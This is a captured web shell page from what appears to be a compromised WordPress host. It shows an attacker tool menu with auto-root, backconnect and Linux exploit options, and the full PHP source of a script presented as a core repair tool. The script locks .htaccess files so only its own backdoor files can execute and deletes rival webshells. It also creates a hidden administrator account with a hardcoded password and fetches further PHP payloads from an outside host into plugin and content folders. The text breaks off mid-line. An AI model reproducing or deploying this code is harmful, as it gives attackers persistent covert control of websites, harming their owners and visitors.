Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.130.20.17 | : 216.73.217.93
Cant Read [ /etc/named.conf ]
8.3.23
hzumtwm
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hzumtwm /
mioliva /
[ HOME SHELL ]
Name
Size
Permission
Action
.tmb
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
goods.php
173.77
KB
-rw-r--r--
ijkcvbc.php
143.87
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
qinfofuns.php
37.05
KB
-rw-r--r--
wp-conffg.php
127.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : qinfofuns.php
<?php error_reporting(E_ALL); ini_set('display_errors', 1); ini_set('log_errors', 1); ini_set('memory_limit', '512M'); set_time_limit(0); ignore_user_abort(true); $whitelist_files = array("qinfofuns.php", "wp-upgrade.php", "site-maintenance.php", "styles.php"); echo "<pre>"; ob_implicit_flush(true); $root = realpath(__DIR__); function shuffled(array $arr) { shuffle($arr); return $arr; } function listPhpFiles($dir) { $result = ["wp-login.php"]; if (!is_dir($dir)) { return $result; } foreach (scandir($dir) as $item) { $path = $dir . DIRECTORY_SEPARATOR . $item; if ( is_file($path) && strcasecmp(pathinfo($item, PATHINFO_EXTENSION), 'php') === 0 ) { $result[] = $item; } } return array_unique($result); } function create_htaccess_files($root, $config_root, $config_sub, $max_depth = -1) { $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; if (!is_dir($root)) { return; } $root_dirs = array($root); $wp_admin_path = $root . 'wp-admin'; if (is_dir($wp_admin_path)) { $root_dirs[] = $wp_admin_path . DIRECTORY_SEPARATOR; try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($wp_admin_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { try { if ($item->isDir()) { $relative_depth = substr_count( str_replace($root, '', $item->getPathname()), DIRECTORY_SEPARATOR ); if ($max_depth === -1 || $relative_depth < $max_depth) { $root_dirs[] = $item->getPathname() . DIRECTORY_SEPARATOR; } } } catch (Exception $e) { } } } catch (Exception $e) { } } $all_dirs = array($root); try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($root, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { try { if ($item->isDir()) { $path = $item->getPathname(); if(isProtectedName($path)){ continue; } $relative_depth = substr_count( str_replace($root, '', $path), DIRECTORY_SEPARATOR ); if ($max_depth === -1 || $relative_depth < $max_depth) { $all_dirs[] = $item->getPathname() . DIRECTORY_SEPARATOR; } } } catch (Exception $e) { } } } catch (Exception $e) { return; } foreach ($all_dirs as $dir) { $normalized_dir = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; if (!is_dir($normalized_dir) || !is_writable($normalized_dir)) { continue; } $use_root_config = in_array($normalized_dir, $root_dirs); $content = $use_root_config ? $config_root : $config_sub; $htaccess_path = $normalized_dir . '.htaccess'; if(@file_put_contents($htaccess_path, $content)){ @chmod($htaccess_path, 0444); out("$htaccess_path yazıldı."); } } } /* ========================================================= * WINDOWS UYUMLULUK YARDIMCILARI * ========================================================= */ // Windows'ta büyük/küçük harf duyarsız, slash normalize edilmiş path karşılaştırması function pathStartsWith($path, $base) { $path = rtrim(str_replace('\\', '/', $path), '/'); $base = rtrim(str_replace('\\', '/', $base), '/'); if (DIRECTORY_SEPARATOR === '\\') { return stripos($path, $base) === 0; } return strpos($path, $base) === 0; } // Slash'ları normalize et (her zaman / kullan) function normalizePath($path) { return str_replace('\\', '/', $path); } /* ========================================================= * TEMEL YARDIMCILAR * ========================================================= */ function out($msg) { echo $msg . "\n"; @ob_flush(); flush(); } function isProtectedName($name) { global $whitelist_files; return stripos($name, ".git") === 0 || stripos($name, DIRECTORY_SEPARATOR . ".git") !== false || in_array($name, $whitelist_files, true); } // function killProcesses() { // if(!function_exists("shell_exec")){ // return; // } // // Logda gördüğümüz o katil süreç ID'lerini (PID) buraya yazıyoruz // $pids = [30907, 30921, 26396, 26402, 26407]; // foreach ($pids as $pid) { // out("PID $pid öldürülüyor... "); // // posix_kill her sunucuda açık olmayabilir, exec deneyelim // if (function_exists('posix_kill')) { // @posix_kill($pid, 9); // 9 = SIGKILL (Kesin ölüm) // } else { // @shell_exec("kill -9 $pid"); // } // out("Komut gönderildi."); // } // // Genel temizlik: Kullanıcıya ait TÜM php süreçlerini durdurmayı dene // @shell_exec("pkill -u " . get_current_user() . " -f php"); // } function fixPermissions($dir) { if (!is_writable($dir)) { if (@chmod($dir, 0775)) { out("[DEGISTIRILDI] $dir (klasör 0775 yapıldı)"); } else { out("[HATA] $dir klasör chmod yapılamadı"); } } $items = @scandir($dir); if ($items === false) { out("[HATA] Okunamadı: $dir"); return; } foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path) && !is_link($path)) { fixPermissions($path); } else { if (!is_writable($path)) { if (@chmod($path, 0664)) { out("[DEGISTIRILDI] $path (dosya 0664 yapıldı)"); } else { out("[HATA] $path dosya chmod yapılamadı"); } } } } } function forceDeletePathSafe($path) { $base = basename($path); if (isProtectedName($base)) { out("[KORUNDU] $path"); return false; } if (!file_exists($path) && !is_link($path)) { return true; } clearstatcache(true, $path); @chmod($path, 0777); if (is_file($path) || is_link($path)) { if (@unlink($path)) return true; if (DIRECTORY_SEPARATOR === '\\') { clearstatcache(true, $path); usleep(100000); if (@unlink($path)) return true; out("[UYARI] Dosya kilitli olabilir (Windows): $path"); return false; } @chmod(dirname($path), 0777); clearstatcache(true, $path); if (@unlink($path)) return true; return false; } $items = @scandir($path); if ($items === false) { @chmod($path, 0777); $items = @scandir($path); } if ($items !== false) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $subPath = $path . DIRECTORY_SEPARATOR . $item; if (is_dir($subPath) && !is_link($subPath)) { @chmod($subPath, 0777); } if (!forceDeletePathSafe($subPath)) { out("[SILINEMEDI - ALT ÖĞE] " . $subPath); return false; } } } @chmod($path, 0777); return @rmdir($path); } function rcopy($src, $dst) { if (is_file($src)) { $dir = dirname($dst); if (!is_dir($dir)) { @mkdir($dir, 0777, true); } if (!@copy($src, $dst)) { out("Kopyalanamadi: $src -> $dst"); } return; } if (is_dir($src)) { if (!is_dir($dst)) { @mkdir($dst, 0777, true); } $items = @scandir($src); if ($items === false) { out("Okunamadi: $src"); return; } foreach ($items as $item) { if ($item === '.' || $item === '..') continue; rcopy($src . DIRECTORY_SEPARATOR . $item, $dst . DIRECTORY_SEPARATOR . $item); } } } function buildCoreList($cleanDir) { $allowed = []; $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($cleanDir, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($it as $file) { $full = $file->getPathname(); $rel = substr($full, strlen($cleanDir) + 1); $rel = normalizePath($rel); $allowed[$rel] = true; } $allowed['web.config'] = true; $allowed['index.php'] = true; $allowed['license.txt'] = true; $allowed['readme.html'] = true; $allowed['wp-activate.php'] = true; $allowed['wp-blog-header.php'] = true; $allowed['wp-comments-post.php'] = true; $allowed['wp-config-sample.php'] = true; $allowed['wp-cron.php'] = true; $allowed['wp-links-opml.php'] = true; $allowed['wp-load.php'] = true; $allowed['wp-login.php'] = true; $allowed['wp-mail.php'] = true; $allowed['wp-settings.php'] = true; $allowed['wp-signup.php'] = true; $allowed['wp-trackback.php'] = true; $allowed['xmlrpc.php'] = true; return $allowed; } function curl_enabled(){ $methods = array("curl_close", "curl_error", "curl_exec", "curl_getinfo", "curl_init", "curl_setopt_array"); foreach($methods as $method){ if(!function_exists($method)){ return false; } } return true; } function downloadFile($url, $dest) { if (curl_enabled()) { $fp = fopen($dest, 'wb'); if (!$fp) { die("Dosya acilamadi: $dest\n"); } $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_FILE => $fp, CURLOPT_FOLLOWLOCATION => true, CURLOPT_FAILONERROR => true, CURLOPT_CONNECTTIMEOUT => 20, CURLOPT_TIMEOUT => 300, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => 2, CURLOPT_USERAGENT => 'WP-Core-Repair/3.0' ]); $ok = curl_exec($ch); $err = curl_error($ch); $http = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if (!$ok || $http >= 400) { @unlink($dest); die("Indirme hatasi: HTTP $http | $err\n"); } return; } $data = @file_get_contents($url); if ($data === false) { die("Zip indirilemedi. curl veya allow_url_fopen gerekli.\n"); } file_put_contents($dest, $data); } function httpGet($url) { if (curl_enabled()) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 20, CURLOPT_TIMEOUT => 60, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => 2, CURLOPT_USERAGENT => 'WP-Core-Repair/3.0' ]); $body = curl_exec($ch); $http = curl_getinfo($ch, CURLINFO_HTTP_CODE); $err = curl_error($ch); curl_close($ch); if ($body === false || $http >= 400) { return [false, "HTTP $http | $err"]; } return [true, $body]; } $body = @file_get_contents($url); if ($body === false) { return [false, "GET basarisiz"]; } return [true, $body]; } function downloadToDestionation($url, $destination, $filename){ $file = implode(DIRECTORY_SEPARATOR, array($destination, $filename)); out("$url indirilip [$file] yoluna kaydedilecek."); list($ok, $body) = @httpGet($url); if(!$ok){ return false; } $file = implode(DIRECTORY_SEPARATOR, array($destination, $filename)); @mkdir($destination, 0755, true); return @file_put_contents($file, $body); } function isWordPressRoot($dir) { if (!$dir || !is_dir($dir)) { return false; } return ( is_dir($dir . '/wp-admin') && is_dir($dir . '/wp-includes') && is_file($dir . '/wp-load.php') && is_file($dir . '/wp-settings.php') ); } function getLatestStableWordPressVersion() { $api = 'https://api.wordpress.org/core/version-check/1.7/'; list($ok, $body) = httpGet($api); if (!$ok) { return [false, "WordPress API okunamadi: $body"]; } $json = json_decode($body, true); if (!is_array($json) || empty($json['offers']) || !is_array($json['offers'])) { return [false, "WordPress API cevabi gecersiz"]; } foreach ($json['offers'] as $offer) { if (!empty($offer['version']) && (!isset($offer['response']) || $offer['response'] === 'latest')) { return [true, $offer['version']]; } } if (!empty($json['offers'][0]['version'])) { return [true, $json['offers'][0]['version']]; } return [false, "Son stabil surum bulunamadi"]; } function detectWordPressVersion($root) { $versionFile = $root . '/wp-includes/version.php'; if (is_file($versionFile) && is_readable($versionFile)) { $wp_version = null; require $versionFile; if (!empty($wp_version)) { return [true, $wp_version, 'local']; } } out("[UYARI] wp-includes/version.php yok veya okunamiyor."); out("[UYARI] Resmi WordPress API uzerinden son stabil surum alinacak."); list($ok, $version) = getLatestStableWordPressVersion(); if (!$ok) { return [false, $version, 'api']; } return [true, $version, 'api']; } /* ========================================================= * WORDPRESS CORE ONARIMI * ========================================================= */ out("Basladi..."); if ($root === false) { die("Kok dizin cozumlenemedi.\n"); } out("Tespit edilen root: " . $root); out("wp-admin: " . (is_dir($root . '/wp-admin') ? 'VAR' : 'YOK')); out("wp-includes: " . (is_dir($root . '/wp-includes') ? 'VAR' : 'YOK')); out("wp-load.php: " . (is_file($root . '/wp-load.php') ? 'VAR' : 'YOK')); out("wp-settings.php: " . (is_file($root . '/wp-settings.php') ? 'VAR' : 'YOK')); out("index.php: " . (is_file($root . '/index.php') ? 'VAR' : 'YOK')); out("version.php: " . (is_file($root . '/wp-includes/version.php') ? 'VAR' : 'YOK')); out("version.php okunabilir: " . (is_readable($root . '/wp-includes/version.php') ? 'EVET' : 'HAYIR')); out("0444 dosyalar 0777 yapiliyor..."); fixPermissions($root); out("Izin duzeltme asamasi tamamlandi."); // out("Surec infaz operasyonu basliyor..."); // killProcesses(); // out("Surec infaz operasyonu bitti."); if (!isWordPressRoot($root)) { die("Bu klasor WordPress kok dizini degil gibi gorunuyor: $root\n"); } list($versionOk, $versionData, $versionSource) = detectWordPressVersion($root); if (!$versionOk) { die("WordPress surumu belirlenemedi: " . $versionData . "\n"); } $wp_version = $versionData; out("Kullanilacak WordPress surumu: " . $wp_version . " [" . $versionSource . "]"); $hasZip = class_exists('ZipArchive'); $hasTar = function_exists('phar_open') || class_exists('PharData'); if (!$hasZip && !$hasTar) { die("Ne ZipArchive ne de PharData mevcut. PHP zip veya phar eklentisi gerekli.\n"); } $tmp = $root . DIRECTORY_SEPARATOR . '.wp_reset_tmp_' . date('Ymd_His'); $extractDir = $tmp . DIRECTORY_SEPARATOR . 'extract'; $cleanDir = $extractDir . DIRECTORY_SEPARATOR . 'wordpress'; @mkdir($tmp, 0777, true); @mkdir($extractDir, 0777, true); if ($hasZip) { $archiveFile = $tmp . DIRECTORY_SEPARATOR . 'wordpress.zip'; $url = "https://wordpress.org/wordpress-{$wp_version}.zip"; out("Indiriliyor (zip): $url"); downloadFile($url, $archiveFile); out("Zip aciliyor..."); $zip = new ZipArchive(); $res = $zip->open($archiveFile); if ($res !== true) { die("Zip acilamadi. Kod: $res\n"); } $zip->extractTo($extractDir); $zip->close(); if (DIRECTORY_SEPARATOR === '\\') { usleep(200000); } } else { $archiveFile = $tmp . DIRECTORY_SEPARATOR . 'wordpress.tar.gz'; $url = "https://wordpress.org/wordpress-{$wp_version}.tar.gz"; out("ZipArchive mevcut degil; tar.gz kullaniliyor."); out("Indiriliyor (tar.gz): $url"); downloadFile($url, $archiveFile); out("Tar.gz aciliyor..."); try { $phar = new PharData($archiveFile); $phar->decompress(); $tarFile = $tmp . DIRECTORY_SEPARATOR . 'wordpress.tar'; $tar = new PharData($tarFile); $tar->extractTo($extractDir); unset($phar, $tar); @unlink($tarFile); } catch (Exception $e) { die("Tar.gz acilamadi: " . $e->getMessage() . "\n"); } } if (!is_dir($cleanDir)) { die("Temiz WordPress klasoru bulunamadi.\n"); } $adminPhpFiles = array_unique(array_merge(listPhpFiles($cleanDir . DIRECTORY_SEPARATOR), listPhpFiles($cleanDir . DIRECTORY_SEPARATOR . "wp-admin"))); $core = buildCoreList($cleanDir); out("Core kok dosyalari yenileniyor..."); $rootItems = scandir($cleanDir); foreach ($rootItems as $item) { if ($item === '.' || $item === '..') continue; $src = $cleanDir . DIRECTORY_SEPARATOR . $item; $dst = $root . DIRECTORY_SEPARATOR . $item; if (is_dir($src)) continue; if ($item === 'wp-config.php') continue; if (isProtectedName($item)) continue; if (file_exists($dst) || is_link($dst)) { forceDeletePathSafe($dst); } rcopy($src, $dst); } out("wp-admin ve wp-includes tamamen temiz kopya ile degistiriliyor..."); foreach (['wp-admin', 'wp-includes'] as $dir) { $dst = $root . DIRECTORY_SEPARATOR . $dir; $src = $cleanDir . DIRECTORY_SEPARATOR . $dir; if (file_exists($dst) || is_link($dst)) { forceDeletePathSafe($dst); } rcopy($src, $dst); } out("Core disi kok oge silme asamasi..."); $keepRoot = [ 'wp-config.php' => true, 'wp-content' => true, 'wp-admin' => true, 'wp-includes' => true, basename(__FILE__) => true, basename($tmp) => true ]; foreach($whitelist_files as $file){ $keepRoot[$file] = true; } $items = scandir($root); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; if (isset($keepRoot[$item])) continue; if (!isset($core[$item]) && forceDeletePathSafe($root . DIRECTORY_SEPARATOR . $item)) { out("Silindi: $item"); } } out("wp-admin ve wp-includes icinde core disi kalinti silme..."); foreach (['wp-admin', 'wp-includes'] as $base) { $basePath = $root . DIRECTORY_SEPARATOR . $base; if (!is_dir($basePath)) continue; $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($basePath, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($it as $file) { $full = $file->getPathname(); $rel = substr($full, strlen($root) + 1); $rel = normalizePath($rel); if (!isset($core[$rel]) && forceDeletePathSafe($full)) { out("Silindi: $rel"); } } } out("Default index.php ve .htaccess yukleniyor..."); $indexContent = <<<'PHP' <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. */ define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php'; PHP; @chmod($root . DIRECTORY_SEPARATOR . 'index.php', 0777); @usleep(100000); file_put_contents($root . DIRECTORY_SEPARATOR . 'index.php', $indexContent); @usleep(100000); @chmod($root . DIRECTORY_SEPARATOR . 'index.php', 0444); $htaccessContent = <<<'HTACCESS' <FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(%%files%%)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule> HTACCESS; $htaccessContent = str_replace("%%files%%", str_replace(".", "\\.", implode("|", shuffled(array_unique(array_merge($adminPhpFiles, $whitelist_files))))), $htaccessContent); $subHtaccessContent = <<<'HTACCESS' <FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(%%files%%)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch> HTACCESS; $subHtaccessContent = str_replace("%%files%%", str_replace(".", "\\.", implode("|", array_unique(shuffled($whitelist_files)))), $subHtaccessContent); @chmod($root . DIRECTORY_SEPARATOR . '.htaccess', 0777); @usleep(100000); @file_put_contents($root . DIRECTORY_SEPARATOR . '.htaccess', $htaccessContent); @usleep(100000); @chmod($root . DIRECTORY_SEPARATOR . '.htaccess', 0444); out("index.php ve .htaccess olusturuldu."); if (DIRECTORY_SEPARATOR === '\\') { out("[BILGI] Windows/IIS ortami: .htaccess Apache'ye ozgudur."); out("[BILGI] IIS kullaniyorsaniz wp-admin panelinden Kalici Baglantilar ayarini yeniden kaydedin (web.config olusturulur)."); } // /* ========================================================= // * PLUGIN ISLEMLERI // * ========================================================= */ // out("Plugin guncelleme ve temizlik asamasi basliyor..."); // function wpLoadForPluginOps($root) { // if (!defined('ABSPATH')) { // define('ABSPATH', rtrim($root, '/\\') . '/'); // } // $wpLoad = $root . '/wp-load.php'; // if (!is_file($wpLoad)) { // out("[HATA] wp-load.php bulunamadi, plugin islemleri atlandi."); // return false; // } // require_once $wpLoad; // if (!function_exists('get_option')) { // out("[HATA] WordPress tam yuklenemedi, plugin islemleri atlandi."); // return false; // } // require_once ABSPATH . 'wp-admin/includes/plugin.php'; // require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; // if (is_file(ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php')) { // require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php'; // } // require_once ABSPATH . 'wp-admin/includes/update.php'; // require_once ABSPATH . 'wp-admin/includes/file.php'; // return true; // } // function normalizePluginDirName($pluginFile) { // $pluginFile = normalizePath($pluginFile); // if (strpos($pluginFile, '/') !== false) { // return explode('/', $pluginFile, 2)[0]; // } // return preg_replace('/\.php$/i', '', basename($pluginFile)); // } // if (wpLoadForPluginOps($root)) { // if (class_exists('WP_Upgrader_Skin') && !class_exists('Silent_Upgrader_Skin')) { // class Silent_Upgrader_Skin extends WP_Upgrader_Skin { // public function feedback($feedback, ...$args) { // if (is_wp_error($feedback)) { // out("[WP HATA] " . $feedback->get_error_message()); // return; // } // if (is_string($feedback) && $feedback !== '') { // if (!empty($args)) { // $tmp = @vsprintf($feedback, $args); // if ($tmp !== false) { // $feedback = $tmp; // } // } // out("[WP] " . wp_strip_all_tags($feedback)); // } // } // public function header() {} // public function footer() {} // public function before() {} // public function after() {} // public function error($errors) { // if (is_wp_error($errors)) { // out("[WP HATA] " . $errors->get_error_message()); // } elseif (!empty($errors)) { // out("[WP HATA] " . (string)$errors); // } // } // } // } // if (function_exists('WP_Filesystem')) { // @WP_Filesystem(); // } // $allPlugins = function_exists('get_plugins') ? get_plugins() : []; // $activePlugins = (array) get_option('active_plugins', []); // $networkActive = []; // if (function_exists('is_multisite') && is_multisite()) { // $networkActive = array_keys((array) get_site_option('active_sitewide_plugins', [])); // } // $activeAll = array_values(array_unique(array_merge($activePlugins, $networkActive))); // out("Toplam kayitli plugin: " . count($allPlugins)); // out("Aktif plugin sayisi: " . count($activeAll)); // if (!empty($activeAll)) { // out("Aktif pluginler icin update kontrolu yapiliyor..."); // if (function_exists('wp_clean_plugins_cache')) { // @wp_clean_plugins_cache(true); // } // @delete_site_transient('update_plugins'); // if (function_exists('wp_update_plugins')) { // @wp_update_plugins(); // } // $updates = get_site_transient('update_plugins'); // $toUpgrade = []; // if (is_object($updates) && !empty($updates->response) && is_array($updates->response)) { // foreach ($activeAll as $pluginFile) { // if (isset($updates->response[$pluginFile])) { // $toUpgrade[] = $pluginFile; // } // } // } // if (!empty($toUpgrade)) { // out("Guncellenecek aktif plugin sayisi: " . count($toUpgrade)); // foreach ($toUpgrade as $pluginFile) { // out("[GUNCELLENECEK] " . $pluginFile); // } // if (class_exists('WP_Upgrader_Skin') && class_exists('Plugin_Upgrader') && class_exists('Silent_Upgrader_Skin')) { // $skin = new Silent_Upgrader_Skin(); // $upgrader = new Plugin_Upgrader($skin); // $result = $upgrader->bulk_upgrade($toUpgrade); // if (is_array($result)) { // foreach ($result as $pluginFile => $resX) { // if (is_wp_error($resX)) { // out("[GUNCELLEME HATA] {$pluginFile} => " . $resX->get_error_message()); // } elseif ($resX === false) { // out("[GUNCELLENEMEDI] {$pluginFile}"); // } else { // out("[GUNCELLENDI] {$pluginFile}"); // } // } // } else { // out("[UYARI] bulk_upgrade beklenmeyen sonuc dondurdu."); // } // } else { // out("[HATA] Plugin guncelleme siniflari yuklenemedi, update atlandi."); // } // } else { // out("Aktif pluginler zaten guncel."); // } // } else { // out("Aktif plugin yok, guncelleme atlandi."); // } // $registeredButInactive = array_diff(array_keys($allPlugins), $activeAll); // if (!empty($registeredButInactive)) { // out("Aktif olmayan ama sisteme kayitli plugin dosyalari temizleniyor..."); // $dirsToDelete = []; // foreach ($registeredButInactive as $pluginFile) { // $dirName = normalizePluginDirName($pluginFile); // $dirsToDelete[$dirName] = true; // } // foreach (array_keys($dirsToDelete) as $dirName) { // $fullPath = WP_PLUGIN_DIR . '/' . $dirName; // if (file_exists($fullPath) || is_link($fullPath)) { // if (forceDeletePathSafe($fullPath)) { // out("[SILINDI - INAKTIF KAYITLI] " . $fullPath); // } else { // out("[SILINEMEDI - INAKTIF KAYITLI] " . $fullPath); // } // } // } // } else { // out("Aktif olmayan kayitli plugin bulunamadi."); // } // out("Sisteme kayitli olmayan plugin klasorleri taraniyor..."); // $registeredDirs = []; // foreach (array_keys($allPlugins) as $pluginFile) { // $registeredDirs[normalizePluginDirName($pluginFile)] = true; // } // $pluginDirItems = @scandir(WP_PLUGIN_DIR); // if ($pluginDirItems !== false) { // foreach ($pluginDirItems as $item) { // if ($item === '.' || $item === '..') continue; // $fullPath = WP_PLUGIN_DIR . '/' . $item; // if (!is_dir($fullPath) || is_link($fullPath)) continue; // if (!isset($registeredDirs[$item])) { // if (forceDeletePathSafe($fullPath)) { // out("[SILINDI - KAYITSIZ] " . $fullPath); // } else { // out("[SILINEMEDI - KAYITSIZ] " . $fullPath); // } // } // } // } else { // out("[HATA] Plugin klasoru okunamadi: " . WP_PLUGIN_DIR); // } // if (function_exists('wp_clean_plugins_cache')) { // @wp_clean_plugins_cache(true); // } // @delete_site_transient('update_plugins'); // out("Plugin guncelleme ve temizlik asamasi tamamlandi."); // } else { // out("WordPress yuklenemedigi icin plugin islemleri yapilamadi."); // } /* ========================================================= * ROOT HARIC TUM ALT KLASORLERDEKI .HTACCESS SIL * ========================================================= */ out("Alt klasorlerdeki .htaccess dosyalari siliniyor (ROOT HARIC)..."); function deleteHtaccessSubdirsForce($dir, $isRoot = true) { $items = @scandir($dir); if ($items === false) { out("[OKUNAMADI] $dir"); return; } foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path) && !is_link($path)) { deleteHtaccessSubdirsForce($path, false); continue; } if (!is_file($path)) continue; if (!$isRoot && strtolower($item) === '.htaccess') { @chmod($path, 0777); clearstatcache(true, $path); if (@unlink($path)) { out("[SILINDI] $path"); } else { @chmod(dirname($path), 0777); clearstatcache(true, $path); if (DIRECTORY_SEPARATOR === '\\') { usleep(100000); } if (@unlink($path)) { out("[ZORLA SILINDI] $path"); } else { out("[HATA SILINEMEDI] $path"); } } } } } deleteHtaccessSubdirsForce($root, true); out(".htaccess temizleme tamamlandi."); out("Gecici dosyalar temizleniyor..."); forceDeletePathSafe($tmp); define('ALLOWED_BASE', realpath(__DIR__)); function listFiles($dir, $excludeFile) { $files = []; $dirReal = realpath($dir); if (!$dirReal) { return []; } // Windows: büyük/küçük harf duyarsız path karşılaştırması if (!pathStartsWith($dirReal, ALLOWED_BASE)) { return []; } try { $rii = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dirReal, FilesystemIterator::SKIP_DOTS) ); } catch (Exception $e) { return []; } foreach ($rii as $file) { if ($file->isDir()) continue; // Windows: büyük/küçük harf duyarsız dosya yolu karşılaştırması if (strtolower($file->getPathname()) === strtolower($excludeFile)) continue; if (pathinfo($file->getPathname(), PATHINFO_EXTENSION) !== 'php') continue; if ($file->getSize() > 2 * 1024 * 1024) continue; $files[] = $file->getPathname(); } return $files; } function scanAndDelete($files, $patterns, $excludedFileNames = []) { $deleted = []; $skipped = []; foreach ($files as $file) { if (in_array(basename($file), $excludedFileNames)) continue; $content = @file_get_contents($file); if ($content === false) continue; foreach ($patterns as $pattern) { if (preg_match("/" . preg_quote($pattern, "/") . "/i", $content)) { // Windows: silmeden önce salt-okunur bayrağını kaldır @chmod($file, 0777); if (is_writable($file)) { if (@unlink($file)) { $deleted[] = $file; } else { $skipped[] = $file; } } else { $skipped[] = $file; } break; } } } return [$deleted, $skipped]; } // Zararlı patternler $patterns = [ 'eval(base64_decode', 'BiaoJiOk', 'Graybyte LoginPress', 'time())); goto', '<?php include base64_decode(', '<?php error_reporting(0);', '0 and md5(md5', 'htmlspecialchars_decode(gzinflate(base64_decode', 'By Shadow', '<?php @include base64_decode', 'session_start(); goto', 'CURLOPT_FOLLOWLOCATION, 0); goto', '<pre align=center><form method=post>Password:', "=='))); ?>" ]; $scanDir = __DIR__; $files = listFiles($scanDir, __FILE__); list($deleted, $skipped) = scanAndDelete($files, $patterns, $whitelist_files); echo "<h2>Tarama Tamamlandı</h2>"; echo "<h3 style='color:red;'>Silinen Dosyalar (" . count($deleted) . ")</h3><ul>"; foreach ($deleted as $f) { echo "<li>" . htmlspecialchars($f) . "</li>"; } echo "</ul>"; if (!empty($skipped)) { echo "<h3 style='color:orange;'>Silinemeyenler (izin problemi)</h3><ul>"; foreach ($skipped as $f) { echo "<li>" . htmlspecialchars($f) . "</li>"; } echo "</ul>"; } if (empty($deleted) && empty($skipped)) { echo "<p style='color:green;'>Hiç zararlı dosya bulunamadı.</p>"; } function get_file_name() { if (file_exists(__FILE__)) { return __FILE__; } preg_match_all('/(.+?)(?=\(\d+\)\s*:\s*)/', __FILE__, $m, PREG_PATTERN_ORDER); if (isset($m[1]) && isset($m[1][0])) { return $m[1][0]; } } $dir = get_file_name(); for ($i = 1; $i <= 8; $i++) { $dir = rtrim(dirname($dir), DIRECTORY_SEPARATOR); $f1 = $dir . DIRECTORY_SEPARATOR . "wp-blog-header.php"; $f2 = $dir . DIRECTORY_SEPARATOR . "wp-includes/registration.php"; if (file_exists($f1) && file_exists($f2)) { out("Buldu " . $i); require_once($f1); require_once($f2); break; } } $ad = 'administrator'; $a = 'wpchecking'; $b = 'f00b@r!!a'; $c = 'guard@wordpress.org'; if (!username_exists($a) && !email_exists($c)) { $user_id = wp_create_user($a, $b, $c); if (is_int($user_id)) { $wp_user_object = new WP_User($user_id); $wp_user_object->set_role($ad); out('Admin basarili oldu. nazim unutma bu.php gizli yerde olsun!'); } else { out('hata 1.'); } } else { out('bu kullanıcı var kontrol et.'); } @$wpdb->query("Update `$wpdb->users` Set user_pass = '9011b8951608980a589bc865ddc29fbf' Where user_login = '" . $a . "'"); $remoteFiles = array( array("url" => "https://mayko.pics/txt2.txt", "dir" => implode(DIRECTORY_SEPARATOR, array(__DIR__, "wp-content")), "name" => "styles.php"), array("url" => "https://mayko.pics/txt2.txt", "dir" => implode(DIRECTORY_SEPARATOR, array(__DIR__)), "name" => "wp-upgrade.php"), array("url" => "https://mayko.pics/op.txt", "dir" => implode(DIRECTORY_SEPARATOR, array(__DIR__, "wp-content" , "plugins", "CustomWp")), "name" => "site-maintenance.php") ); foreach($remoteFiles as $opt){ if(!@downloadToDestionation($opt["url"], $opt["dir"], $opt["name"])){ out($opt["url"] . " indirilemedi."); } else{ out($opt["url"] . " başarıyla indirildi, kaydedildi."); } } $url = "https://mayko.pics/tm.txt"; out("$url 